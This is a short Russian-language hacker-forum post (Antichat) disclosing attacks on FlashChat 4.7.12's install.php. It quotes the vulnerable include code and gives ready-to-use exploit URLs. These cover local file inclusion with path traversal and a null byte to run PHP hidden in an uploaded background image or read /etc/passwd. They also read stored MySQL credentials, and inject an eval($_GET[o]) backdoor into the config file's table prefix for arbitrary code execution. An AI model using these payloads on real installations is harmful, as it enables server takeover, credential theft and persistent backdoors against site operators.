Форум АНТИЧАТ - FlashChat 4.7.12 install.php (LFI) + code exec

Пришлось по работе поковыряться - слил эту версию и по-быстрому просмотрел только процесс инсталляции, так что это типа признания, что я вообще весь чат не смотрел, а только мельком.

1) LFI (need: magic_quotes=off)

Бажный файл: install.php

PHP код:


		
			
...

$step = $_GET['step'];



if( ! $step || $step<0 || $step>8) 

{

    $step = 1;

}



include "./install_files/step_$step.php";

...

В чате можно заливать свой фон для окна чата в формате JPG. Заливаем фон-картинку со своим пхп-кодом и он кладётся сюда: \images\cust_img\

Т.о. пример эксплоита выглядит так:
/install.php?step=/../../images/cust_img/5f_121171317514078.jpg%00

или так:

/install.php?step=/../../../../../../../../../etc/passwd%00

2) Conf read
Вот так читается уже прописанные данные для мускуля в конфиге:

/install.php?step=2

Смотрим сорец и видим пасс за звёздочками, юзера, бр и сервер.. ну всё как пологается вобщем.

3) Cod exec (need: magic_quotes=off)
Ну а тут основано на втором этапе. Конфиг этот можно переписать (если ест ьправа на запись. если их нет - чат выдаст предупреждение что нет прав). Т.о. идём:

/install.php?step=2

и в префикс ДОПИСЫВАЕМ следующее (т.е. то что там было - не стираем):

Код:

',); if (isset($_GET[o])) eval($_GET[o]); /*

После этого выполняем код вот так:
/inc/config.srv.php?o=[your_eval_code]